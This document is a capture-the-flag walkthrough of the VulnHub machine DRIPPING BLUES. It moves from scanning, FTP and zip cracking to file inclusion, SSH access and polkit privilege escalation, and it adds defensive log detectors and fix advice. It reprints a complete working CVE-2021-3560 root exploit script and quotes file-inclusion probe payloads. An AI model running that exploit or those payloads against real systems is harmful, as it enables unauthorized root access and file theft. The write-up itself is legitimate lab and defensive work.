Preparation:
Attacker: Kali virtual machine, native Win10 host.
Target machine: DRIPPING BLUES: 1. The network adapter is set to bridged mode, so the target sits on the same segment as the local computer. Download address: https://download.vulnhub.com/drippingblues/drippingblues.ova; after downloading, just open it directly in VMware.
Knowledge points: CVE-2021-3560 exploitation (polkit vulnerability), cracking a zip file password with fcrackzip, file inclusion.
Information gathering:
Scan for live hosts on the local segment with nmap to determine the target's address: nmap -sn 192.168.4.0/24, which gives the target address 192.168.4.146.
Scan the services behind each port: nmap -T4 -sV -p- -A 192.168.4.146. Ports 21, 22 and 80 are open, running the FTP, SSH and web services.
Try the FTP service and find that it needs no username or password: anonymous login works directly. It holds a file respectmydrip.zip; download and try to decompress it, and find that a password is required.
Looking at port 80, it shows a string and two account names: travisscott & thugger. robots.txt (found during the nmap scan) lists two files: dripisreal.txt and /etc/dripispowerful.html.
Visit dripisreal.txt and /etc/dripispowerful.html: dripisreal.txt contains a hint, but /etc/dripispowerful.html cannot be accessed directly, so a file inclusion vulnerability is suspected.
Directory scan:
Use dirmap for directory scanning; it finds index.php and robots.txt (already known from above).
fcrackzip password cracking:
Use fcrackzip for a dictionary attack on the archive: fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip, which yields the password 072528035.
After decompression you get the respectmydrip.txt file and the secret.zip file. respectmydrip.txt contains the message: just focus on "drip". secret.zip also requires a password, but this one was not cracked.
File inclusion vulnerability:
Visit the index.php page and recall the hint: just focus on "drip". Guess that a parameter named drip exists, include /etc/dripispowerful.html through it, and successfully obtain the password: imdrippinbiatch.
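From the defender's side, the same behaviour is visible in the web server's access log: a parameter value that is an absolute path, a traversal sequence or a PHP stream wrapper. The detector below is an added example, not code from the original writeup; the log lines are constructed to mimic the index.php?drip= requests above, and the parser handles single and double URL encoding.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (not taken from the target machine).
SAMPLE_LOG = """\
192.168.4.1 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
192.168.4.1 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?drip=about HTTP/1.1" 200 512
192.168.4.1 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?drip=/etc/dripispowerful.html HTTP/1.1" 200 734
192.168.4.1 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?drip=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1844
192.168.4.1 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?drip=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2200
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_value(value: str) -> Optional[str]:
    """Return a reason string if a query value looks like a file-inclusion probe."""
    v = unquote(unquote(value))  # decode twice to catch double URL encoding
    if v.startswith("/"):
        return "absolute path"
    if "../" in v or "..\\" in v:
        return "directory traversal"
    if re.match(r"^[a-z0-9.+-]+://", v, re.I):
        return "stream wrapper"
    if "\x00" in v:
        return "null byte"
    return None


def find_lfi_probes(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (param, raw_value, reason) for every query parameter that looks like LFI."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            reason = suspicious_value(value)
            if reason:
                hits.append((param, value, reason))
    return hits
```

The fix on the application side is to never pass the drip value to include() directly: map it through an allow-list of known page names and reject anything else.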
Get a shell:
Use the credentials thugger/imdrippinbiatch to connect over SSH and successfully obtain a shell.
A user.txt file exists in the current user's home directory; read it to obtain the first flag.
Privilege escalation:
Run sudo -l to check which privileged commands are available to the current user; there are none.
Look for files with the SUID bit set: find / -perm -4000 -type f 2>/dev/null. It shows /usr/lib/policykit-1/polkit-agent-helper-1 (emmm, what a coincidence; the previous article on the VulnHub machine CORROSION: 2 also ran into this vulnerability: CVE-2021-4034).
From this site: https://github.com/arthepsy/CVE-2021-4034, download the PoC, compile it with gcc on Kali and upload it to the target machine for execution, but the target machine lacks gcc and it cannot be run. So look for the other polkit vulnerabilities.
Searching GitHub for exploitable polkit bugs finds mainly two: CVE-2021-3560 and CVE-2021-4034 (the latter was tested above and cannot be run because gcc is missing, so next test CVE-2021-3560).
From this site: https://github.com/Almorabea/Polkit-exploit, download the exploit (the download is very slow; copying the code also works), upload it to the target machine, give it execute permission, and run it to obtain root privileges.
```python
import os
import sys
import time
import subprocess
import random
import pwd

print("**************")
print("Exploit: Privilege escalation with polkit - CVE-2021-3560")
print("Exploit code written by Ahmad Almorabea @almorabea")
print("Original exploit author: Kevin Backhouse ")
print("For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/")
print("**************")
print("[+] Starting the Exploit ")
time.sleep(3)

# Phase 1: keep sending CreateUser over D-Bus and killing the request after a
# few milliseconds until the race is won and the user appears in /etc/passwd.
check = True
counter = 0
while check:
    counter = counter + 1
    process = subprocess.Popen(['dbus-send', '--system', '--dest=org.freedesktop.Accounts', '--type=method_call', '--print-reply', '/org/freedesktop/Accounts', 'org.freedesktop.Accounts.CreateUser', 'string:ahmed', 'string:"Ahmad Almorabea', 'int32:1'])
    try:
        #print('1 - Running in process', process.pid)
        Random = random.uniform(0.006, 0.009)
        process.wait(timeout=Random)
        process.kill()
    except subprocess.TimeoutExpired:
        #print('Timed out - killing', process.pid)
        process.kill()

    user = subprocess.run(['id', 'ahmed'], stdout=subprocess.PIPE).stdout.decode('utf-8')
    if user.find("uid") != -1:
        print("[+] User Created with the name of ahmed")
        print("[+] Timed out at: " + str(Random))
        check = False
        break
    if counter > 2000:
        print("[-] Couldn't add the user, try again it may work")
        sys.exit(0)

# Phase 2: same race against SetPassword on the newly created user object.
for i in range(200):
    #print(i)
    uid = "/org/freedesktop/Accounts/User" + str(pwd.getpwnam('ahmed').pw_uid)
    #In case you need to put a password un-comment the code below and put your password after string:yourpassword'
    password = "string:"
    #res = subprocess.run(['openssl', 'passwd','-5',password], stdout=subprocess.PIPE).stdout.decode('utf-8')
    #password = f"string:{res.rstrip()}"
    process = subprocess.Popen(['dbus-send', '--system', '--dest=org.freedesktop.Accounts', '--type=method_call', '--print-reply', uid, 'org.freedesktop.Accounts.User.SetPassword', password, 'string:GoldenEye'])
    try:
        #print('1 - Running in process', process.pid)
        Random = random.uniform(0.006, 0.009)
        process.wait(timeout=Random)
        process.kill()
    except subprocess.TimeoutExpired:
        #print('Timed out - killing', process.pid)
        process.kill()

print("[+] Timed out at: " + str(Random))
print("[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root ")
p = subprocess.call("(su ahmed -c 'sudo su')", shell=True)
```
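Two things a defender can check for CVE-2021-3560 follow from the exploit above: the installed polkit version (the bug was introduced in 0.113 and fixed in 0.119) and the burst of CreateUser requests that accounts-daemon sees while the race is being won. This is an added example, not part of the original writeup; the journal lines are constructed in the "request by ... [cmd]: create user 'name'" shape that accounts-daemon logs, and the window and threshold are assumptions to tune per host.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple


def polkit_vulnerable_to_3560(version: str) -> bool:
    """True for polkit 0.113 through 0.118 (accepts raw 'pkaction --version' output)."""
    m = re.search(r"(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised polkit version: {version!r}")
    major, minor = int(m.group(1)), int(m.group(2))
    return major == 0 and 113 <= minor <= 118


# Constructed journal lines (not real logs from the target machine): six
# CreateUser requests within two seconds from dbus-send, then one legitimate
# request from the desktop control panel minutes later.
SAMPLE_JOURNAL = """\
Jan 01 10:00:00 host accounts-daemon[612]: request by system-bus-name::1.40 [/usr/bin/dbus-send --system --dest=org.freedesktop.Accounts]: create user 'ahmed'
Jan 01 10:00:00 host accounts-daemon[612]: request by system-bus-name::1.41 [/usr/bin/dbus-send --system --dest=org.freedesktop.Accounts]: create user 'ahmed'
Jan 01 10:00:01 host accounts-daemon[612]: request by system-bus-name::1.42 [/usr/bin/dbus-send --system --dest=org.freedesktop.Accounts]: create user 'ahmed'
Jan 01 10:00:01 host accounts-daemon[612]: request by system-bus-name::1.43 [/usr/bin/dbus-send --system --dest=org.freedesktop.Accounts]: create user 'ahmed'
Jan 01 10:00:02 host accounts-daemon[612]: request by system-bus-name::1.44 [/usr/bin/dbus-send --system --dest=org.freedesktop.Accounts]: create user 'ahmed'
Jan 01 10:00:02 host accounts-daemon[612]: request by system-bus-name::1.45 [/usr/bin/dbus-send --system --dest=org.freedesktop.Accounts]: create user 'ahmed'
Jan 01 10:05:00 host accounts-daemon[612]: request by system-bus-name::1.80 [/usr/bin/gnome-control-center]: create user 'alice'
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} \d{2} \d{2}:\d{2}:\d{2}) \S+ accounts-daemon\[\d+\]: "
    r"request by (?P<sender>\S+) \[(?P<cmd>[^\]]*)\]: create user '(?P<user>[^']+)'"
)


def detect_create_user_bursts(journal: str, window_s: int = 10, threshold: int = 5) -> List[Tuple[str, int]]:
    """Return (username, max requests in any window_s-second window) when that max >= threshold."""
    events: Dict[str, List[datetime]] = defaultdict(list)
    for line in journal.splitlines():
        m = LINE_RE.match(line)
        if m:  # short journal format has no year; strptime defaults it, which is fine for windowing
            events[m.group("user")].append(datetime.strptime(m.group("ts"), "%b %d %H:%M:%S"))
    alerts = []
    for user, times in events.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while times[end] - times[start] > timedelta(seconds=window_s):
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts.append((user, best))
    return alerts
```

A single legitimate CreateUser never repeats like this, so even a low threshold is safe; the permanent fix is upgrading polkit to 0.119 or a distribution build that backports the patch.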
Use the root account to successfully read the flag under /root.
I was bored, so I installed gcc using the root account, switched back to the thugger account, and executed the CVE-2021-4034 exploit; root privileges could also be obtained normally that way.